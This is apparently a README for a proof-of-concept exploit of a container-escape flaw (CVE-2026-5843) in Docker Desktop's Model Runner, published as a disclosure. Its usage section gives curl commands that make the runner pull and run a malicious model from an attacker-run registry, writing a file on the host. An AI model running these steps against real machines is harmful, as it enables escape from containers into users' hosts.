davidrxchester/CVE-2026-5843

# CVE-2026-5843 PoC **Requires:** Docker Desktop ≤ 4.70.x (Apple Silicon) with Model Runner enabled ## Usage # 1. Start the registry on the host python3 poc_cve_2026_5843.py # 2. From any container on the Docker network docker run -it --rm curlimages/curl sh curl -X POST http://model-runner.docker.internal/api/pull \ -H 'Content-Type: application/json' \ -d '{"name":"localhost:5555/evil/model:latest"}' curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \ -H 'Content-Type: application/json' \ -d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}' Output is written to `~/Desktop/mlx.txt` on the host. Full writeup: https://davidrochester.com/posts/container-escape-via-inference ## Related CVEs - [CVE-2026-5817](https://github.com/gouldnicholas/CVE-2026-5817-PoC) — vllm-metal `trust_remote_code=True`, same attack surface, patched in Docker Desktop 4.68.0